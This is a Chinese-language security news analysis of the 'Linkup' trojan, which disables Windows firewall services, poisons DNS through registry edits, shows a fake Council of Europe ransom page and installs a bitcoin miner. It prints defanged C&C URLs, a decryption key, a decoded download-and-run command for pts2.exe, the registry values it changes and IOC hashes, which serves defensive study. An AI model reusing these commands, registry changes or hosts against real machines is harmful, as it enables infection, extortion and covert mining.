悄悄的干活，打枪的不要！勒索+比特币挖矿木马

FreeBuf曾报道过一些勒索用户支付赎金的木马：

1千万英国用户被Cryptolocker勒索软件瞄准

英国NCA向公众发出警告：CryptoLocker恶意程序肆虐网络

如何保护你的计算机不被恶意软件勒索

气焰嚣张勒索木马：打劫你没商量

地下论坛惊见全新档案加密勒索软件PowerLocker

Emsisoft团队最近发现了一款名为"Linkup"的木马（Trojan-Ransom.Win32.Linkup），Linkup不会直接加密电脑中的档案，而是直接关闭Windows防火墙服务、锁定你的DNS然后让你的机器辅助挖比特币。

这一切当然是悄悄的进行的，当你不能正常上网了之后会发现浏览器经常会访问这个网页：

或者这样：

看似一本正经的 Council of Europe 的页面 （体验一下： 62.75.221.37），甚至会警告你观看“儿童色情”，只需0.01欧元就可以立即恢复网络链接。

一旦Linkup执行后，会在%AppData%\Microsoft\Windows文件夹下创建svchost.exe，然后禁用windows的安全和防火墙服务：

Linkup会向服务器以加密的形式POST你机器的信息：

token解密后大致是这样:

uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU&wv=5.1.2600.SP3.0.256.1.2.x86&ia=1

这包含了你的编号，系统的版本，使用的是何种语言。这样会方便木马的感染，让Linkup知道在什么样的机器上工作并且是否在正常工作。

Linkup使用了冗余机制，解密后会发现准备了多台C&C服务器：

hxxp://62.75.221.37/uplink.php?logo.jpg
hxxp://hoseen45r.com/uplink.php?logo.jpg
hxxp://onetimes21s.com/uplink.php?logo.jpg
hxxp://setpec14rs.com/uplink.php?logo.jpg

C&C服务器会向Linkup发送如下加密后的指令：

nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV

解密的key是

Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI

解开后是这样的（如图）：

IL 62.75.221.37
RUN hxxp://91.220.163.22/pts2.exe

IL 62.75.221.37 命令会重定向每一条http请求到勒索的页面上。同样，Linkup 也在注册表中做了手脚：

• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%"NameServer" = "127.0.0.1" HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%interfaceGUID%"DhcpNameServer" = "127.0.0.1"

重启服务，保证DNS毒化成功：

RUN hxxp://91.220.163.22/pts2.exe 命令会让你的计算机下载并运行 pts2.exe ， pts2.exe会伪装成Svchost.exe并下载hxxp://64.32.28.155/b.exe，b.exe会存储在C:\Users\Public\b.exe 。这是一个自解压程序，其中的脚本会释放一个64位的PE文件，命名为j.exe ，也就是jhProtominer 。正如其名称所暗示的， jhProtominer是一个Protoshares挖掘应用程序。

黑客利用Linkup获得了更强的计算能力来获取更多的比特币，为了使挖矿僵尸网络间保持通信流畅，毒化了dns并顺便想要敲诈受害者一笔（钱或重要口令和个人信息）。

来自Emsisoft团队的相关文件hash：

Trojan-Ransom.Win32.LinkupMD5: f1304992523cd68f7412a355d2fb9d5dSHA1: 
ce70e50707b456e0e2f086126bdcfa266d5a57ae
pts2.exe (Trojan-Downloader.Win32.Linkup)MD5: 7eb809d8ea5bfe602648752289669632SHA1:
 20bd75b9c47ac075d51783a5f3c5309091c7c6a7
b.exe (Trojan.Win32.Miner – Self-extracting Archive)MD5: 29eea4cd040bff1028d5b6092f22f9bfSHA1: 
1b3389328f9ebf706f09445ca0adc5efd2e98f79
j.exe (jhProtominer)MD5: 2e9a71e4ee33d190056e081e6726fa56
SHA1: db355fc276b8174e1753f45dbdf52536f7740316